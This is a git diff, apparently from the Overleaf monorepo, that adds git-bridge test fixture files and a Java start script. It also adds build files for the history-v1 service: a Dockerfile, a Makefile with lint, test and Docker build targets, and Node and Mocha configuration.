b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/logs/HEAD new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/logs/refs/heads/master b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/logs/refs/heads/master new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/objects/info/packs b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/objects/info/packs new file mode 100644 index 0000000..bbfa012 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/objects/info/packs @@ -0,0 +1,2 @@ +P pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.pack + diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/objects/pack/pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.idx b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/objects/pack/pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.idx new file mode 100644 index 0000000..30d5e13 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/objects/pack/pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.idx differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/objects/pack/pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.pack b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/objects/pack/pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.pack new file mode 100644 index 0000000..d28e3bd Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/objects/pack/pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.pack differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/packed-refs b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/packed-refs new file mode 100644 index 0000000..102f77f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/packed-refs @@ -0,0 +1,2 @@ +# pack-refs with: peeled fully-peeled +71ebe5d70c8634f7531cc09c1cad5dae951a9052 refs/heads/master diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/file1.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/file1.txt new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/file2.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/file2.txt new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfFileNamesAreNotEqual/neq1/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfFileNamesAreNotEqual/neq1/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfFileNamesAreNotEqual/neq1/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfFileNamesAreNotEqual/neq1/neq1.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfFileNamesAreNotEqual/neq1/neq1.txt new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfFileNamesAreNotEqual/neq2/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfFileNamesAreNotEqual/neq2/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfFileNamesAreNotEqual/neq2/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfFileNamesAreNotEqual/neq2/neq2.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfFileNamesAreNotEqual/neq2/neq2.txt new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfInnerDirectoryNamesAreNotEqual/neq1/neq1/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfInnerDirectoryNamesAreNotEqual/neq1/neq1/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfInnerDirectoryNamesAreNotEqual/neq1/neq1/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfInnerDirectoryNamesAreNotEqual/neq2/neq2/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfInnerDirectoryNamesAreNotEqual/neq2/neq2/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfInnerDirectoryNamesAreNotEqual/neq2/neq2/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenFilesAreNotEqualInBothDirectories/neq1/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenFilesAreNotEqualInBothDirectories/neq1/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenFilesAreNotEqualInBothDirectories/neq1/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenFilesAreNotEqualInBothDirectories/neq2/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenFilesAreNotEqualInBothDirectories/neq2/file.txt new file mode 100644 index 0000000..81c545e --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenFilesAreNotEqualInBothDirectories/neq2/file.txt @@ -0,0 +1 @@ +1234 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq1/dir/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq1/dir/file.txt new file mode 100644 index 0000000..274c005 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq1/dir/file.txt @@ -0,0 +1 @@ +1234 \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq1/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq1/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq1/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq2/dir/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq2/dir/file.txt new file mode 100644 index 0000000..d800886 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq2/dir/file.txt @@ -0,0 +1 @@ +123 \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq2/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq2/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq2/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq1/dir/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq1/dir/file.txt new file mode 100644 index 0000000..d800886 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq1/dir/file.txt @@ -0,0 +1 @@ +123 \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq1/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq1/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq1/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq2/dir/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq2/dir/file.txt new file mode 100644 index 0000000..d800886 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq2/dir/file.txt @@ -0,0 +1 @@ +123 \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq2/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq2/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq2/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenFilesAreEqualInBothDirectories/eq1/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenFilesAreEqualInBothDirectories/eq1/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenFilesAreEqualInBothDirectories/eq1/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenFilesAreEqualInBothDirectories/eq2/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenFilesAreEqualInBothDirectories/eq2/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenFilesAreEqualInBothDirectories/eq2/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq1/dir/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq1/dir/file.txt new file mode 100644 index 0000000..d800886 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq1/dir/file.txt @@ -0,0 +1 @@ +123 \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq1/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq1/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq1/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq2/dir/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq2/dir/file.txt new file mode 100644 index 0000000..d800886 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq2/dir/file.txt @@ -0,0 +1 @@ +123 \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq2/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq2/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq2/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/dir_with_empty_file/empty b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/dir_with_empty_file/empty new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/file1 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/file1 new file mode 100644 index 0000000..e212970 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/file1 @@ -0,0 +1 @@ +file1 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/file2 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/file2 new file mode 100644 index 0000000..6c493ff --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/file2 @@ -0,0 +1 @@ +file2 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/nest1/file1 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/nest1/file1 new file mode 100644 index 0000000..5c441e6 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/nest1/file1 @@ -0,0 +1 @@ +nest1/file1 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/nest1/file2 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/nest1/file2 new file mode 100644 index 0000000..2b7361b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/nest1/file2 @@ -0,0 +1 @@ +nest1file2 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/nest1/file3 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/nest1/file3 new file mode 100644 index 0000000..ac69189 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/nest1/file3 @@ -0,0 +1 @@ +nest1/file3 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/nest1/nest2/file1 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/nest1/nest2/file1 new file mode 100644 index 0000000..5e92e63 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/nest1/nest2/file1 @@ -0,0 +1 @@ +nest1/nest2/file1 diff --git a/services/git-bridge/start.sh b/services/git-bridge/start.sh new file mode 100755 index 0000000..714eeba --- /dev/null +++ b/services/git-bridge/start.sh @@ -0,0 +1,15 @@ +#!/bin/sh + +/opt/envsubst < /envsubst_template.json > /conf/runtime.json + +VERSION=$(date +%y%m%d%H%M%S) + +if [ -z "$GIT_BRIDGE_JVM_ARGS" ]; then + GIT_BRIDGE_JVM_ARGS="-XX:+UseContainerSupport -XX:MaxRAMPercentage=50.0" +fi + +if [ "$ENABLE_PROFILE_AGENT" = "true" ]; then + GIT_BRIDGE_JVM_ARGS="-agentpath:/opt/cprof/profiler_java_agent.so=-cprof_service=git-bridge,-cprof_service_version=${VERSION},-cprof_enable_heap_sampling=true ${GIT_BRIDGE_JVM_ARGS}" +fi + +exec java $GIT_BRIDGE_JVM_ARGS -jar /git-bridge.jar /conf/runtime.json diff --git a/services/git-bridge/vendor/envsubst b/services/git-bridge/vendor/envsubst new file mode 100755 index 0000000..f7ad808 Binary files /dev/null and b/services/git-bridge/vendor/envsubst differ diff --git a/services/history-v1/.gitignore b/services/history-v1/.gitignore new file mode 100644 index 0000000..edb0f85 --- /dev/null +++ b/services/history-v1/.gitignore @@ -0,0 +1,3 @@ + +# managed by monorepo$ bin/update_build_scripts +.npmrc diff --git a/services/history-v1/.mocharc.json b/services/history-v1/.mocharc.json new file mode 100644 index 0000000..dc3280a --- /dev/null +++ b/services/history-v1/.mocharc.json @@ -0,0 +1,3 @@ +{ + "require": "test/setup.js" +} diff --git a/services/history-v1/.nvmrc b/services/history-v1/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/services/history-v1/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/services/history-v1/Dockerfile b/services/history-v1/Dockerfile new file mode 100644 index 0000000..0aa6a2f --- /dev/null +++ b/services/history-v1/Dockerfile @@ -0,0 +1,32 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +FROM node:20.18.2 AS base + +WORKDIR /overleaf/services/history-v1 +COPY services/history-v1/install_deps.sh /overleaf/services/history-v1/ +RUN chmod 0755 ./install_deps.sh && ./install_deps.sh + +# Google Cloud Storage needs a writable $HOME/.config for resumable uploads +# (see https://googleapis.dev/nodejs/storage/latest/File.html#createWriteStream) +RUN mkdir /home/node/.config && chown node:node /home/node/.config + +# fs persistor needs a writable folder as a target for the mounted volume +RUN mkdir /buckets && chown node:node /buckets + +FROM base AS app + +COPY package.json package-lock.json /overleaf/ +COPY services/history-v1/package.json /overleaf/services/history-v1/ +COPY libraries/ /overleaf/libraries/ +COPY patches/ /overleaf/patches/ + +RUN cd /overleaf && npm ci --quiet + +COPY services/history-v1/ /overleaf/services/history-v1/ + +FROM app +USER node + +CMD ["node", "--expose-gc", "app.js"] diff --git a/services/history-v1/Makefile b/services/history-v1/Makefile new file mode 100644 index 0000000..1f03a21 --- /dev/null +++ b/services/history-v1/Makefile @@ -0,0 +1,156 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +BUILD_NUMBER ?= local +BRANCH_NAME ?= $(shell git rev-parse --abbrev-ref HEAD) +PROJECT_NAME = history-v1 +BUILD_DIR_NAME = $(shell pwd | xargs basename | tr -cd '[a-zA-Z0-9_.\-]') + +DOCKER_COMPOSE_FLAGS ?= -f docker-compose.yml +DOCKER_COMPOSE := BUILD_NUMBER=$(BUILD_NUMBER) \ + BRANCH_NAME=$(BRANCH_NAME) \ + PROJECT_NAME=$(PROJECT_NAME) \ + MOCHA_GREP=${MOCHA_GREP} \ + docker compose ${DOCKER_COMPOSE_FLAGS} + +COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE ?= test_acceptance_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_ACCEPTANCE = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE) $(DOCKER_COMPOSE) + +COMPOSE_PROJECT_NAME_TEST_UNIT ?= test_unit_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_UNIT = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_UNIT) $(DOCKER_COMPOSE) + +clean: + -docker rmi ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -docker rmi us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -$(DOCKER_COMPOSE_TEST_UNIT) down --rmi local + -$(DOCKER_COMPOSE_TEST_ACCEPTANCE) down --rmi local + +HERE=$(shell pwd) +MONOREPO=$(shell cd ../../ && pwd) +# Run the linting commands in the scope of the monorepo. +# Eslint and prettier (plus some configs) are on the root. +RUN_LINTING = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(HERE) node:20.18.2 npm run --silent + +RUN_LINTING_CI = docker run --rm --volume $(MONOREPO)/.editorconfig:/overleaf/.editorconfig --volume $(MONOREPO)/.eslintignore:/overleaf/.eslintignore --volume $(MONOREPO)/.eslintrc:/overleaf/.eslintrc --volume $(MONOREPO)/.prettierignore:/overleaf/.prettierignore --volume $(MONOREPO)/.prettierrc:/overleaf/.prettierrc --volume $(MONOREPO)/tsconfig.backend.json:/overleaf/tsconfig.backend.json ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) npm run --silent + +# Same but from the top of the monorepo +RUN_LINTING_MONOREPO = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(MONOREPO) node:20.18.2 npm run --silent + +SHELLCHECK_OPTS = \ + --shell=bash \ + --external-sources +SHELLCHECK_COLOR := $(if $(CI),--color=never,--color) +SHELLCHECK_FILES := { git ls-files "*.sh" -z; git grep -Plz "\A\#\!.*bash"; } | sort -zu + +shellcheck: + @$(SHELLCHECK_FILES) | xargs -0 -r docker run --rm -v $(HERE):/mnt -w /mnt \ + koalaman/shellcheck:stable $(SHELLCHECK_OPTS) $(SHELLCHECK_COLOR) + +shellcheck_fix: + @$(SHELLCHECK_FILES) | while IFS= read -r -d '' file; do \ + diff=$$(docker run --rm -v $(HERE):/mnt -w /mnt koalaman/shellcheck:stable $(SHELLCHECK_OPTS) --format=diff "$$file" 2>/dev/null); \ + if [ -n "$$diff" ] && ! echo "$$diff" | patch -p1 >/dev/null 2>&1; then echo "\033[31m$$file\033[0m"; \ + elif [ -n "$$diff" ]; then echo "$$file"; \ + else echo "\033[2m$$file\033[0m"; fi \ + done + +format: + $(RUN_LINTING) format + +format_ci: + $(RUN_LINTING_CI) format + +format_fix: + $(RUN_LINTING) format:fix + +lint: + $(RUN_LINTING) lint + +lint_ci: + $(RUN_LINTING_CI) lint + +lint_fix: + $(RUN_LINTING) lint:fix + +typecheck: + $(RUN_LINTING) types:check + +typecheck_ci: + $(RUN_LINTING_CI) types:check + +test: format lint typecheck shellcheck test_unit test_acceptance + +test_unit: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) run --rm test_unit + $(MAKE) test_unit_clean +endif + +test_clean: test_unit_clean +test_unit_clean: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) down -v -t 0 +endif + +test_acceptance: test_acceptance_clean test_acceptance_pre_run test_acceptance_run + $(MAKE) test_acceptance_clean + +test_acceptance_debug: test_acceptance_clean test_acceptance_pre_run test_acceptance_run_debug + $(MAKE) test_acceptance_clean + +test_acceptance_run: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance +endif + +test_acceptance_run_debug: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run -p 127.0.0.9:19999:19999 --rm test_acceptance npm run test:acceptance -- --inspect=0.0.0.0:19999 --inspect-brk +endif + +test_clean: test_acceptance_clean +test_acceptance_clean: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) down -v -t 0 + +test_acceptance_pre_run: +ifneq (,$(wildcard test/acceptance/js/scripts/pre-run)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance test/acceptance/js/scripts/pre-run +endif + +benchmarks: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance npm run benchmarks + +build: + docker build \ + --pull \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --tag ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):main \ + --file Dockerfile \ + ../.. + +tar: + $(DOCKER_COMPOSE) up tar + +publish: + + docker push $(DOCKER_REPO)/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + + +.PHONY: clean \ + format format_fix \ + lint lint_fix \ + build_types typecheck \ + lint_ci format_ci typecheck_ci \ + shellcheck shellcheck_fix \ + test test_clean test_unit test_unit_clean \ + test_acceptance test_acceptance_debug test_acceptance_pre_run \ + test_acceptance_run test_acceptance_run_debug 